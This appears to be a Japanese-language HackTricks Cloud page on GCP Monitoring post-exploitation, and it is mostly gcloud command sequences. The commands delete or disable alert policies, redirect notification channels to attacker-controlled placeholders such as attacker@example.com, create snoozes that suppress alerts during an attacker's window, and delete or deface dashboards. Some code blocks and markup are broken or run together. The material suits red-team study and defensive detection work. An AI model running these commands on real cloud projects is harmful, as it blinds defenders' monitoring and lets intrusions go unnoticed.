GCP - Monitoring Post Exploitation

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！

**💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。

HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

Monitoring

詳細は次を参照してください：

GCP - Monitoring Enum

ログを妨害する他の方法については次を参照してください：

GCP - Logging Post Exploitation

`monitoring.alertPolicies.delete`

アラートポリシーを削除する：

アラートポリシーを削除

```bash gcloud alpha monitoring policies delete ```

`monitoring.alertPolicies.update`

アラートポリシーを妨害する:

アラートポリシーを妨害する

```bash # Disable policy gcloud alpha monitoring policies update --no-enabled

Remove all notification channels

gcloud alpha monitoring policies update –clear-notification-channels

Chnage notification channels

gcloud alpha monitoring policies update –set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

Modify alert conditions

gcloud alpha monitoring policies update –policy=“{ ‘displayName’: ‘New Policy Name’, ‘conditions’: [ … ], ‘combiner’: ‘AND’, … }”

or use –policy-from-file

</details>

### `monitoring.dashboards.update`

ダッシュボードを変更して妨害する:

<details>

<summary>ダッシュボードを妨害する</summary>
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''

`monitoring.dashboards.delete`

ダッシュボードを削除する:

ダッシュボードを削除

```bash # Delete dashboard gcloud monitoring dashboards delete ```

`monitoring.snoozes.create`

snoozer を作成してポリシーによるアラート発生を防ぐ:

アラートを停止するための snoozer を作成

```bash # Stop alerts by creating a snoozer gcloud monitoring snoozes create --display-name="Maintenance Week" \ --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ --start-time="2023-03-01T03:00:00.0-0500" \ --end-time="2023-03-07T23:59:59.5-0500" ```

`monitoring.snoozes.update`

攻撃者が関心を持つ時間帯にアラートが作成されないように、snoozer のタイミングを更新する:

snoozer のタイミングを更新

```bash # Modify the timing of a snooze gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME

odify everything, including affected policies

gcloud monitoring snoozes update –snooze-from-file=

</details>

### `monitoring.notificationChannels.delete`

設定済みのチャネルを削除する:

<details>

<summary>通知チャネルを削除</summary>
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>

`monitoring.notificationChannels.update`

チャネルのラベルを更新して妨害する:

通知チャネルのラベルを更新

```bash # Delete or update labels, for example email channels have the email indicated here gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com ```

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！

**💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。

HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。